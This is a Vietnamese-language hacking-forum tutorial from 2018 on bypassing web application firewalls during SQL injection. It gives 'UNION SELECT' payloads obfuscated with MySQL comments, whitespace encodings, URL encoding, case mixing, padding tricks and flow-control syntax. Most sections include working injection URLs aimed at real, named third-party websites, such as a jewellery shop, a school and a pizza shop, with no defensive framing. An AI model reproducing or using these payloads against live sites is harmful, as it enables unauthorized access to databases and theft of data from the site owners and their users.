Tutorial Uni0n 3elect Bypassing Pocket Reference

Discussion in 'Web Application Security & Hacking' started by admin, Feb 21, 2018.

  1. admin

    admin Administrator Staff Member

    Xin chò mọi nguwoif hôm nay tôi sẽ nói tới một cách bypass union select khá hay và đặc biệt ở trong phần này tôi sẽ đề cập tới toán tử union select
    Trong loạt bài này tôi sẽ chỉ cho bạn cách bypass union select hiệu quả

    Notic-1: Xóa dấu cách giữa Uni trên And Sel ect để Query có thể chạy
    Notic-2: bypass

    1- Comment's & NukeSentinel (Nuke Evolution)

    PHP:
    /*!00000*/
    /**/
    /*x*/
    /**x**/
    /*%26*/
    /%2A%2A/
    %2f**%2f
    MySQL Server hỗ trợ một số biến thể của ý kiến kiểu C. Các tính năng này cho phép bạn viết mã bao gồm các phần mở rộng của MySQL, nhưng vẫn có thể di động bằng cách sử dụng các nhận xét dưới đây:

    PHP:
    /*! MySQL-specific code */
    PHP:
    http://www.amin.org/articles.php?t=ENews&id=5272 and 0 uni on Sel eCt 1,2,3,4 -- -
    [​IMG]

    PHP:
    http://www.amin.org/articles.php?t=ENews&id=5272 and 0 /*!50000uni on*/ Sel eCt 1,2,3,4 -- -
    [​IMG]

    Từ ký tự / * đến ký tự * /, như trong ngôn ngữ lập trình C. Cú pháp này cho phép một nhận xét mở rộng qua nhiều dòng vì trình tự bắt đầu và kết thúc không nhất thiết phải nằm trên cùng một dòng.

    2- WhiteSpace Block

    Phương pháp này sẽ áp dụng tính năng Tìm và Thay thế để thay thế không gian trống bằng không có gì khỏi các ô đã chọn một cách dễ dàng.

    PHP:
    %0a
    %0b
    %0d
    %C0
    %20
    %09
    %0c
    %a0
    ví dụ
    PHP:
    And%a01 Uni On%a0dIstiNctRoW SeL EcT
    PHP:
    %0duni on%0dsel ect%0d
    PHP:
    didaticativa.com/historia_companhia.php?id=.216 un ion sel ect 1,2,concat (0x223e,33333,0x3c212d2d)--
    [​IMG]

    PHP:
    didaticativa.com/historia_companhia.php?id=.216%0duni on%0dselsele ctect%0d1,2,concat (0x223e,33333,0x3c212d2d)--
    [​IMG]

    3- Bypass Applied In Between

    PHP:
    uni on [all|distinct] sel ect [all|distinct]

    PHP:
    And/**/.0union/*%26*/distinctROW+select

    And .0UnIOn-- -%0ASeLe%43t

    or .0union/**/distinctrow select/**/distinctrow

    And .0union/**/distinctrow select/**/distinctrow
    PHP:
    http://www.bellajoias.com.br/categoria.php?id=3 And point(53,12) uni on sEL ect!1,2,3,4,5,6,7#
    [​IMG]

    PHP:
    http://www.bellajoias.com.br/categoria.php?id=3 And point(53,12) uni on/**/distinctrow sEL ect!1,2,3,4,5,6,7#
    [​IMG]


    4- URL_Encode

    URL chỉ có thể được gửi qua Internet bằng cách sử dụng bộ ký tự ASCII. Vì URL thường chứa các ký tự bên ngoài bộ ASCII nên URL phải được chuyển đổi thành định dạng ASCII hợp lệ.

    Mã hóa URL sẽ thay thế các ký tự ASCII không an toàn bằng chữ “%” theo sau là hai chữ số thập lục phân.

    URL không thể chứa dấu cách. Mã hoá URL thường thay thế một không gian với dấu cộng (+) hoặc bằng %20.

    PHP:
    space%20
    ! %21
    " %22
    # %23
    $ %24
    % %25
    & %26
    ' %27
    ( %28
    ) %29
    * %2A
    + %2B
    , %2C
    - %2D
    . %2E
    / %2F
    0 %30
    1 %31
    2 %32
    3 %33
    4 %34
    5 %35
    6 %36
    7 %37
    8 %38
    9 %39
    : %3A
    ; %3B
    < %3C
    = %3D
    > %3E
    ? %3F
    @ %40
    A %41
    B %42
    C %43
    D %44
    E %45
    F %46
    G %47
    H %48
    I %49
    J %4A
    K %4B
    L %4C
    M %4D
    N %4E
    O %4F
    P %50
    Q %51
    R %52
    S %53
    T %54
    U %55
    V %56
    W %57
    X %58
    Y %59
    Z %5A
    [ %5B
    \ %5C
    ] %5D
    ^ %5E
    _ %5F
    ` %60
    a %61
    b %62
    c %63
    d %64
    e %65
    f %66
    g %67
    h %68
    i %69
    j %6A
    k %6B
    l %6C
    m %6D
    n %6E
    o %6F
    p %70
    q %71
    r %72
    s %73
    t %74
    u %75
    v %76
    w %77
    x %78
    y %79
    z %7A
    { %7B
    | %7C
    } %7D
    ~ %7E
    PHP:
    http://rahmaniyah.ac.id/stiair/index.php?jp=news&id=.4 uni on sel ect 1,2,3,4,5,6,7,8-- -
    [​IMG]


    PHP:
    http://rahmaniyah.ac.id/stiair/index.php?jp=news&id=.4 %75ni on %73el ect 1,2,3,4,5,6,7,8-- -
    [​IMG]


    5: Alphanumeric letters [Capital Letters]

    Normal Case
    PHP:
    uni on sel ect
    With Capital Letters
    PHP:
    Union Select
    unioN seleCt
    UNIoN SELeCt
    6- Gear Fourth

    Query
    PHP:
    or .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow
    And .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow
    PHP:
    or .0union/**/distinctrow%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aselect/**/distinctrow
    PHP:
    And .0union/**/distinctrow%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aselect/**/distinctrow
    PHP:
    https://pizzacrust.com.pk/deals.php?id=.38" uni on sel ect 1,2,3,4,5,6,7-- -
    [​IMG]

    PHP:
    https://pizzacrust.com.pk/deals.php?id=.38" or .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow 1,2,3,4,5,6,7-- -
    [​IMG]

    PHP:
    https://pizzacrust.com.pk/deals.php?id=.38" And .0uni on/**/distinctrow%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB%0asel ect/**/distinctrow 1,2,3,4,5,6,7-- -
    [​IMG]

    7- Flow Control [Function To Control ID Output] Credit To Benzi

    Query

    PHP:
    ID=.4||!{f`id`}union-- a%[email protected]
    ID={f -5} union-- a%[email protected]
    PHP:
    || means "or" .
    [2] ! means not() .
    [3] {f} means timestamp .
    [4] `id` is the column .
    [5] --%0a means comment and new line .
    [6] the @ after is just to stick a char to select, @ is a temporary variable .
    PHP:
    http://www.bellajoias.com.br/categoria.php?id=3 And point(53,12) uni on sEL ect!1,2,3,4,5,6,7#
    [​IMG]

    PHP:
    http://www.bellajoias.com.br/categoria.php?id=3||!{f`id`}union-- a%[email protected],2,3,4,5,6,7#
    [​IMG]

    PHP:
    http://www.bellajoias.com.br/categoria.php?id={f -3}un ion-- a%0Asel [email protected],2,3,4,5,6,7#
    [​IMG]

    [email protected]
    My PGP key: https://goo.gl/triziq
     

Share This Page